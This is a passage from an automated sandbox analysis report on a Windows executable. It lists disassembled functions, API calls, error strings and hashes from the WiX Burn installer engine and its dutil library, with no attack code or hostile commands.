                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-3877478192
                                                                                                                                                          • Opcode ID: 9498e18d91cd803432a73621d9f80ef5d83f89e53396f77353e9963671704d1c
                                                                                                                                                          • Instruction ID: 574ef0fb8053fd087bf130b0803d3d6fc5c2ead358f305387f358faba80cce68
                                                                                                                                                          • Opcode Fuzzy Hash: 9498e18d91cd803432a73621d9f80ef5d83f89e53396f77353e9963671704d1c
                                                                                                                                                          • Instruction Fuzzy Hash: F401C832A80224FBDF115F50CC4AF8A3A25DB04765F108276FE08BE1E1D7B99A509BD8
                                                                                                                                                          Function 00401641 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 00401651
                                                                                                                                                            • Part of subcall function 00401453: GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
                                                                                                                                                            • Part of subcall function 00401453: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
                                                                                                                                                          • SetDefaultDllDirectories.KERNELBASE ref: 00401673
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 00401679
                                                                                                                                                          • SetDllDirectoryW.KERNEL32 ref: 00401696
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 004016A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2226491684-0
                                                                                                                                                          • Opcode ID: d48458f4f4ccb4a5e1ada93a125564d6035d6516b5022034d9fb52c787f0c9ba
                                                                                                                                                          • Instruction ID: d7b2a472efe89d176b3165b33a13f653d1d5e660ca6525406a815b62733955cd
                                                                                                                                                          • Opcode Fuzzy Hash: d48458f4f4ccb4a5e1ada93a125564d6035d6516b5022034d9fb52c787f0c9ba
                                                                                                                                                          • Instruction Fuzzy Hash: 8C019231501115ABCB20AF15DC099AF7B69FF80791B448137F819672B4CA79A941CFA8
                                                                                                                                                          Function 0040C0B1 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,0040E97F,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0040EB78,00000001), ref: 0040C0BD
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,0040E97F,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0040EB78), ref: 0040C131
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to copy value of variable: %ls, xrefs: 0040C10F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C121
                                                                                                                                                          • Failed to get value of variable: %ls, xrefs: 0040C0E3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-137256104
                                                                                                                                                          • Opcode ID: d089b050b8b1840b0a77e41697f838382790e016444f7829ac2f3033c4461d12
                                                                                                                                                          • Instruction ID: 40007c2c0fc9f95719c9480caae907e9b7ac99b110b42d982e9faef4d2760d78
                                                                                                                                                          • Opcode Fuzzy Hash: d089b050b8b1840b0a77e41697f838382790e016444f7829ac2f3033c4461d12
                                                                                                                                                          • Instruction Fuzzy Hash: FC018435640228FBDF116F55CC4AFCE3A14DF04765F108122FE08B91D1D6B99A609AD8
                                                                                                                                                          Function 0042B86A Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0042B873
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0042B881
                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0042B8A4
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042B8AC
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0042B8B3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSelect$CompatibleCreateDeleteStretch
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 732282326-0
                                                                                                                                                          • Opcode ID: 5f70854fc188ece16cf65a49b62dd9752d2a7cb6fa0c4d79b1f800c80ee0f615
                                                                                                                                                          • Instruction ID: 29c8d5d6b762205c6008d8a801a03ac8536dc3be2063f87b4b0670ba188ab02a
                                                                                                                                                          • Opcode Fuzzy Hash: 5f70854fc188ece16cf65a49b62dd9752d2a7cb6fa0c4d79b1f800c80ee0f615
                                                                                                                                                          • Instruction Fuzzy Hash: D9F0F876105344BFDB211FA1EC48DBBBFAEFB483613508829FA5A82121C7329C54DB64
                                                                                                                                                          Function 0041FB75 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FC6B, 0041FCAE
                                                                                                                                                          • Failed to copy provider key for compatible entry., xrefs: 0041FC59
                                                                                                                                                          • Failed to get provider information for compatible package: %ls, xrefs: 0041FC9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 3535843008-891480179
                                                                                                                                                          • Opcode ID: 859c231efaecc4d4b60d080682fc33df8d0fb360a6ca5658a4a7cac096e9c856
                                                                                                                                                          • Instruction ID: 0f0128e2610420067fc15b1d715e229cffa9a49603b33576e788fb9082614647
                                                                                                                                                          • Opcode Fuzzy Hash: 859c231efaecc4d4b60d080682fc33df8d0fb360a6ca5658a4a7cac096e9c856
                                                                                                                                                          • Instruction Fuzzy Hash: 80414271E0061AEFDB14DFA4C841FEEBBB4BB04710F10426AE915F7380E3785A859B99
                                                                                                                                                          Function 0041FCC4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F8B9: RegCloseKey.ADVAPI32(00000214,00000120,00000120,00020019,00000214,000004A0,00000120,000001F8,00000120,00000120,?,?,?,0041FCE3,?,?), ref: 0046FA0A
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,00000000,000000FF,?,?,000001F8,00000000,00000000,000004A0,00000120,00000000,?,0041FA04), ref: 0041FD38
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FD85
                                                                                                                                                          • Failed to initialize provider key bundle id., xrefs: 0041FD73
                                                                                                                                                          • Failed to get provider key bundle id., xrefs: 0041FD0C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCompareString
                                                                                                                                                          • String ID: Failed to get provider key bundle id.$Failed to initialize provider key bundle id.$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 446873843-22166859
                                                                                                                                                          • Opcode ID: 8c193ad363b6fba0a87c04a9d594eca1971e9ff03780b9823cc69eb306fd9d2d
                                                                                                                                                          • Instruction ID: a8f402618ac758df1e63075a48bbc03f2022fec066cf35c1aa9af0d939a0fcc6
                                                                                                                                                          • Opcode Fuzzy Hash: 8c193ad363b6fba0a87c04a9d594eca1971e9ff03780b9823cc69eb306fd9d2d
                                                                                                                                                          • Instruction Fuzzy Hash: 21213031640211B7DB252A54AC46FFB3B15FF44721F500177FE06BA2D1D6B94CD187A9
                                                                                                                                                          Function 0042248F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224F7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224FD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastProcess
                                                                                                                                                          • String ID: CreateProcessW failed with return code: %d$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 2919029540-2450435645
                                                                                                                                                          • Opcode ID: a8ebf3fee6370b8e8a1dde527b33422e14cf7e710ee150d8ef001fc4ac064c42
                                                                                                                                                          • Instruction ID: 7425ab7fcaedabe76eb5de61a9264da31149d2fc0723cf7abb5d6a2b381a85e2
                                                                                                                                                          • Opcode Fuzzy Hash: a8ebf3fee6370b8e8a1dde527b33422e14cf7e710ee150d8ef001fc4ac064c42
                                                                                                                                                          • Instruction Fuzzy Hash: E4112436A0022877DB206E529D09E9F3E6CEFC4B54F45402AFE04BB240E678DC41CBB8
                                                                                                                                                          Function 00470ABB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00470B65
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open policy key: %ls, name: %ls, xrefs: 00470B3A
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470AEC, 00470B46
                                                                                                                                                          • Failed to open policy key: %ls, xrefs: 00470AE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                          • API String ID: 3535843008-840529963
                                                                                                                                                          • Opcode ID: b145da9f9181cb78c73b2fbc6c146efb26d57aadcb2ac1e83237a9d74fcc69d2
                                                                                                                                                          • Instruction ID: a40a45f624d8b6e852ff072c8d334889f502c78aabab5023eeea3904ab49b9d6
                                                                                                                                                          • Opcode Fuzzy Hash: b145da9f9181cb78c73b2fbc6c146efb26d57aadcb2ac1e83237a9d74fcc69d2
                                                                                                                                                          • Instruction Fuzzy Hash: 4B21D172A41325FBDB215ED48C46FDB7A28DB15728F118026FE0876191D2BCAF1096E9
                                                                                                                                                          Function 00467C83 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,?,0041775F,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 00467CB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3660427363-4169281069
                                                                                                                                                          • Opcode ID: b32474f52ce7408ba4098f60274c62d00568a339d22d38861501ae5833f6a3f7
                                                                                                                                                          • Instruction ID: 00e170bcaadf47f87b2509ebb5bc24c56e13704c2f7f8098420f5670af0c3e5c
                                                                                                                                                          • Opcode Fuzzy Hash: b32474f52ce7408ba4098f60274c62d00568a339d22d38861501ae5833f6a3f7
                                                                                                                                                          • Instruction Fuzzy Hash: 7411E976904548BBEB209A068C49EAF7A6DDFC5768F25407FBA04B7280F17C4E01D6BD
                                                                                                                                                          Function 0046DBE2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,0047B210,00000000,00000000,00000000,00000000,00000000), ref: 0046DC74
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to hash the string., xrefs: 0046DC37
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 0046DC0B
                                                                                                                                                          • Invalid dictionary - bucket size index is out of range, xrefs: 0046DBF7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
                                                                                                                                                          • API String ID: 1825529933-451009152
                                                                                                                                                          • Opcode ID: 68042592eacc7570f321763f43af57551a09ae7db16cd42b39d65a9d5d473f66
                                                                                                                                                          • Instruction ID: c7ab4b91135166851d102ad668eb51f4aa86afa4b42328d71244cee8e6d6523e
                                                                                                                                                          • Opcode Fuzzy Hash: 68042592eacc7570f321763f43af57551a09ae7db16cd42b39d65a9d5d473f66
                                                                                                                                                          • Instruction Fuzzy Hash: A421C131F40215BBCB10DF88DC85F5A7765FB16720F10021AF514AB2D0E7B9AD10DBAA
                                                                                                                                                          Function 0046F226 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.OLE32(004AA48C,00000000,00000001,004AA49C,00000000,00000000,00000000,?,?,?,00416708,00000000,?,?,00419037,000004A0), ref: 0046F243
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                          • String ID: Failed to determine if restart is required from WUA.$Failed to get WUA system information interface.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
                                                                                                                                                          • API String ID: 542301482-2589206279
                                                                                                                                                          • Opcode ID: 27c761bd073b86d485441db83b334e126d8751db98750ea5e00a1859ffc8e2a7
                                                                                                                                                          • Instruction ID: 572f34490b1fe966732eaceae312f8007a39ec3f22efb6a590ccde22f8e21961
                                                                                                                                                          • Opcode Fuzzy Hash: 27c761bd073b86d485441db83b334e126d8751db98750ea5e00a1859ffc8e2a7
                                                                                                                                                          • Instruction Fuzzy Hash: C211D275740714BBDA019759DC0AF9F37699B86B10F1140AAF908BB2C0EBB85D41CAAE
                                                                                                                                                          Function 00471919 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000214,00000120,000000B0,?,?,?,00000120,00000080,000004B0,00000080,00000200,00000214,000004A0,00000120,00000214,00000000), ref: 0047192A
                                                                                                                                                            • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
                                                                                                                                                            • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
                                                                                                                                                            • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
                                                                                                                                                            • Part of subcall function 004716E9: RegCloseKey.ADVAPI32(00000000,00020019,?,?,000001D0,00000001,00000120), ref: 004717C4
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 004719C6
                                                                                                                                                          • Failed to query 64-bit related bundles., xrefs: 004719B7
                                                                                                                                                          • Failed to query 32-bit related bundles., xrefs: 0047198A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                          • String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                          • API String ID: 3109562764-165303569
                                                                                                                                                          • Opcode ID: 15e5b83053ad883ecabcd2ba2d17465edda8359a880cbec4f4fccf4a8a9e6d22
                                                                                                                                                          • Instruction ID: bcd3cb871bfea37ee2dd97c5e48ce62f4b7f0230f3e0212de8dd5fe97e5638d6
                                                                                                                                                          • Opcode Fuzzy Hash: 15e5b83053ad883ecabcd2ba2d17465edda8359a880cbec4f4fccf4a8a9e6d22
                                                                                                                                                          • Instruction Fuzzy Hash: 1321B6B5E01219ABCB51DFA9D845ADE7BF4AB08754F10411AF908F7340E7789A00CB94
                                                                                                                                                          Function 0041519B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,0041F35B,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 004151ED
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\package.cpp, xrefs: 00415233
                                                                                                                                                          • Failed to copy the property value., xrefs: 00415221
